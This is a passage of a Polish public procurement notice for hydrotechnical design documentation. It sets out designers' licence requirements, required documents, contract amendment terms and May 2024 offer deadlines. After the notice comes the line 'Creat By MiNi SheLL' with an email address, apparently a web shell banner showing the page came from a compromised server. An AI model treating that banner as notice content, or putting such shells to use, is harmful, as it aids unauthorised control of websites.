na pełnieniu przez tą osobę w ciągu ostatnich pięciu lat przed terminem<br/>składania ofert funkcji koordynatora zespołu projektowego, który wykonał co najmniej jedną dokumentację projektową<br/>budowli hydrotechnicznej o wartości kosztorysowej nie niższej niż 500 tys. zł, która będzie pełniła funkcję projektanta<br/>wiodącego koordynującego pracę pozostałych projektantów,<br/>b. jedna osoba posiadająca uprawnienia budowlane do projektowania w specjalności inżynieryjnej mostowej, <br/>c. jedna osoba posiadająca uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji<br/>i urządzeń elektrycznych i elektroenergetycznych lub telekomunikacyjnej.<br/>3. Uprawnienia, o których mowa w ust. 2 powinny być zgodne z ustawą Prawo budowlane oraz Rozporządzeniem Ministra<br/>Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnychfunkcji technicznych w budownictwie lub odpowiadającym im uprawnieniom, nadanym na podstawie wcześniej<br/>obowiązujących przepisów. <br/>W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą oni spełniać<br/>wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w<br/>budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach<br/>określonych w przepisach ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej. <br/>Zamawiający dopuszcza sytuację, w której jedna osoba przewidziana przez Wykonawcę do realizacji zamówienia posiadała<br/>będzie uprawnienia do projektowania w więcej niż jednej specjalności. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających spełnianie warunków udziału w postępowaniu: <br/>1) Uzupełniony wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za opracowanie dokumentacji projektowej, w tym zakres wykonywanych przez nie czynności zawierające<br/>informacje o posiadanych przez te osoby uprawnieniach zawodowych i podstawie do dysponowania tymi osobami, sporządzony wg wzoru określonego w Załączniku nr 6.1 i nr 6.2 do SWZ – odpowiednio do Części 1 i Części 2.<br/>2) w zakresie realizacji Części 1: referencje potwierdzające prawidłowe wykonanie przez osoby wymienione w Rozdziale VIII ust 2 pkt 1) litera „e” „f” i „g” wskazanych tam usług.<br/>Rozdziale VIII ust 2 pkt 2) litera „a” wskazanych tam usług.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz oferty, dostępny na stronie internetowej zamówienia.<br/>2) Formularz cenowy, którego wzór określono w Załącznikach nr 1.1 i 1.2 do SWZ – odpowiednio do Części 1 i Części 2. <br/>4) Oświadczenia, o których mowa pkt 3 składają: <br/>a) Wykonawca/każdy z Wykonawców wspólnie ubiegających się o zamówienie – zgodnie z wzorem określonym w<br/>Załączniku nr 2 do SWZ,<br/>b) Podmiot/podmioty udostępniające zasoby celem potwierdzenia spełniania warunków udziału w postępowaniu– zgodnie z<br/>wzorem określonym w Załączniku nr 3 do SWZ.<br/>5) W celu potwierdzenia, że osoba/osoby działające w imieniu Wykonawcy są umocowane do jego reprezentowania –<br/>Zamawiający żąda dołączenia do oferty Odpisu lub Informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru, przy czym oferta nie musi zawierać tych<br/>dokumentów w przypadku wskazania przez Wykonawcę, że są one dostępne w formie elektronicznej pod określonymi<br/>adresami internetowymi ogólnodostępnych i bezpłatnych baz danych. Upoważnienie osób podpisujących ofertę musi<br/>bezpośrednio wynikać z ww. dokumentów. Dokumenty muszą być podpisane kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym.<br/>6) Jeżeli dotyczy, do oferty należy dołączyć pełnomocnictwa do reprezentowania albo reprezentowania i zawarcia umowy<br/>Wykonawców składających ofertę wspólnie; podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym mocodawcy lub mocodawców. Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem<br/>kwalifikowanym, podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu)<br/>pełnomocnictw sporządzonych uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego<br/>stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. Prawo o notariacie, które to poświadczenie notariusz opatruje<br/>kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w<br/>formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>8) Jeżeli dotyczy, do oferty należy dołączyć zobowiązanie podmiotu udostępniającego zasoby, zgodnie z wzorem<br/>określonym w Załączniku nr 5 do SWZ, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca, realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów – podpisane kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym podmiotu udostępniającego zasoby (art. 118 ust. 4 ustawy p.z.p.). Zobowiązanie<br/>podmiotu udostępniającego zasoby musi potwierdzać, że stosunek łączący Wykonawcę z podmiotami udostępniającymi<br/>zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz musi określać w szczególności:<br/>a. Zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>b. Sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia,<br/>c. Czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale<br/>XV ust. 9 pkt 4 lit. a SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) dołączają do oferty oświadczenie podpisane<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym pełnomocnika, z którego wynika,<br/>które usługi wykonają poszczególni Wykonawcy (art.117 ust. 4. ustawy p.z.p.), zgodnie z wzorem określonym w Załączniku<br/>nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Ewentualna zmiana umowy wymaga formy pisemnej i zgody obydwu Stron w formie aneksu do umowy pod rygorem<br/>nieważności, z wyłączeniem zmian wyraźnie w treści umowy wskazanych jako niewymagające aneksu.<br/>2. Dopuszcza się następujące możliwości zmiany treści umowy: <br/>1) Zmiana wartości umowy w przypadku:<br/>a) zmiany stawki i kwoty podatku VAT prowadzącej do zmiany wynagrodzenia brutto określonego w § 3 ust. 1, w przypadku,<br/>gdy stawka podatku VAT ulegnie zmianie na mocy powszechnie obowiązujących przepisów,<br/>b) zmniejszenia zakresu przedmiotu Zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie<br/>publicznym,<br/>c) zaistnienia niemożliwych wcześniej do przewidzenia okoliczności powodującej konieczność udzielenia zamówienia<br/>dodatkowego o wartości nie przekraczającej 50% wartości zamówienia określonej pierwotnie w umowie.<br/>2) Zmiana terminu realizacji przedmiotu zamówienia, w przypadku: <br/>a) działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie, o okres działania siły<br/>wyższej oraz potrzebny do usunięcia skutków tego działania,<br/>b) realizacji wymagań organów administracji publicznej postawionych na podstawie obowiązujących przepisów, o okres<br/>określony przez organ administracji publicznej,<br/>c) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy, powodującego konieczność<br/>skoordynowania prac i uwzględnienia wzajemnych powiązań, o okres niezbędny do wykonania prac powiązanych z<br/>przedmiotem niniejszej umowy, realizowanych w drodze odrębnej umowy,<br/>d) konieczności zmniejszenia zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w<br/>interesie Zamawiającego, o okres proporcjonalny do zmniejszonego zakresu.<br/>3) Zmiana siedziby Stron umowy i numeru rachunku bankowego.<br/>3. Przez działanie siły wyższej rozumie się wypadek drogowy, kolejowy lub lotniczy, pożar, epidemię oraz wszystkie inne<br/>okoliczności powstające na skutek zdarzeń losowych, których przewidzenie jest niemożliwe, zaś skutki mogą mieć<br/>bezpośrednie przełożenie na sytuację Stron, pod warunkiem wykazania wpływu tych okoliczności na niezachowanie<br/>pierwotnego terminu realizacji umowy. <br/>4. Strony zobowiązane są do niezwłocznego informowania o okolicznościach stanowiących podstawę do zmiany umowy, nie<br/>dłużej niż w ciągu 7 dni od dnia wystąpienia tych okoliczności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-07 17:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2c6bc391-024a-11ef-b81b-aebd110f5279</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-07 17:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com